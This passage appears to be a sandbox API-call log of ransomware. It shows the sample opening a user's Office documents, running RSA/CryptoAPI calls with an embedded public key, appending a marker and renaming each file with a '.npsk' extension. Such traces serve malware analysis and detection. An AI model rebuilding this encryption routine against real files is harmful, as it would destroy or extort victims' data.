hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3e5c10, ftCreationTime.dwHighDateTime=0x1d5d9b7, ftLastAccessTime.dwLowDateTime=0xfd8da250, ftLastAccessTime.dwHighDateTime=0x1d5b595, ftLastWriteTime.dwLowDateTime=0xfd8da250, ftLastWriteTime.dwHighDateTime=0x1d5b595, nFileSizeHigh=0x0, nFileSizeLow=0x2448, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2GP755S YY6b.xlsx", cAlternateFileName="2GP755~1.XLS")) returned 1 [0215.171] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2GP755S YY6b.xlsx") returned=".xlsx" [0215.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2GP755S YY6b.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2gp755s yy6b.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.176] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=9288) returned 1 [0215.176] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.178] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2422, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.178] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.180] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2448, lpOverlapped=0x0) returned 1 [0215.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.181] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.182] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.182] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.182] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.182] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.182] GetLastError () returned 0x0 [0215.182] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.182] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.183] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.183] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.183] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.183] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.183] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.183] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.183] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2448, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.183] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.184] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.184] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.184] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.184] CloseHandle (hObject=0x61c) returned 1 [0215.186] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2GP755S YY6b.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2gp755s yy6b.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2GP755S YY6b.xlsx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2gp755s yy6b.xlsx.npsk")) returned 1 [0215.189] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.189] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.189] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.190] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e7d8 | out: hHeap=0x750000) returned 1 [0215.190] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6bad530, ftCreationTime.dwHighDateTime=0x1d5e3b2, ftLastAccessTime.dwLowDateTime=0xe7bc1700, ftLastAccessTime.dwHighDateTime=0x1d57598, ftLastWriteTime.dwLowDateTime=0xe7bc1700, ftLastWriteTime.dwHighDateTime=0x1d57598, nFileSizeHigh=0x0, nFileSizeLow=0x2f47, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2QbXHfY0a4AjS2sC.pptx", cAlternateFileName="2QBXHF~1.PPT")) returned 1 [0215.190] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2QbXHfY0a4AjS2sC.pptx") returned=".pptx" [0215.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2QbXHfY0a4AjS2sC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2qbxhfy0a4ajs2sc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.191] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=12103) returned 1 [0215.192] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.194] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2f21, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.194] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.196] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2f47, lpOverlapped=0x0) returned 1 [0215.196] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.197] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.197] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.197] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.198] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.198] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.198] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.198] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.198] GetLastError () returned 0x0 [0215.198] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.198] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.198] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.198] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.198] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.198] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.198] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.199] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.199] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2f47, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.199] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.199] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.200] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.200] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.200] CloseHandle (hObject=0x61c) returned 1 [0215.225] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2QbXHfY0a4AjS2sC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2qbxhfy0a4ajs2sc.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2QbXHfY0a4AjS2sC.pptx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2qbxhfy0a4ajs2sc.pptx.npsk")) returned 1 [0215.226] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.226] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.226] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.227] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e7d8 | out: hHeap=0x750000) returned 1 [0215.227] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6818950, ftCreationTime.dwHighDateTime=0x1d5a2eb, ftLastAccessTime.dwLowDateTime=0x64fcb910, ftLastAccessTime.dwHighDateTime=0x1d55b6b, ftLastWriteTime.dwLowDateTime=0x64fcb910, ftLastWriteTime.dwHighDateTime=0x1d55b6b, nFileSizeHigh=0x0, nFileSizeLow=0xfc4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3agJs7nPJdZ2eI.docx", cAlternateFileName="3AGJS7~1.DOC")) returned 1 [0215.227] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3agJs7nPJdZ2eI.docx") returned=".docx" [0215.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3agJs7nPJdZ2eI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3agjs7npjdz2ei.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.231] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=64586) returned 1 [0215.231] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.234] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xfc24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.234] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.236] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xfc4a, lpOverlapped=0x0) returned 1 [0215.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.237] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.238] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.238] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.238] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.238] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.239] GetLastError () returned 0x0 [0215.239] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.239] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.240] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.240] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.240] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.240] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.240] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.244] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.245] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xfc4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.245] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.246] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.246] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.246] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.246] CloseHandle (hObject=0x61c) returned 1 [0215.267] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3agJs7nPJdZ2eI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3agjs7npjdz2ei.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3agJs7nPJdZ2eI.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3agjs7npjdz2ei.docx.npsk")) returned 1 [0215.268] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.268] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.268] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.269] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e7d8 | out: hHeap=0x750000) returned 1 [0215.269] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30864790, ftCreationTime.dwHighDateTime=0x1d5b9ea, ftLastAccessTime.dwLowDateTime=0xbcbe8110, ftLastAccessTime.dwHighDateTime=0x1d5bb10, ftLastWriteTime.dwLowDateTime=0xbcbe8110, ftLastWriteTime.dwHighDateTime=0x1d5bb10, nFileSizeHigh=0x0, nFileSizeLow=0x4ec1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4dOc.docx", cAlternateFileName="4DOC~1.DOC")) returned 1 [0215.269] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4dOc.docx") returned=".docx" [0215.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4dOc.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4doc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.270] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=20161) returned 1 [0215.270] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.272] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4e9b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.272] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.274] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x4ec1, lpOverlapped=0x0) returned 1 [0215.274] lstrlenA (lpString="-----BEGIN PUBLIC 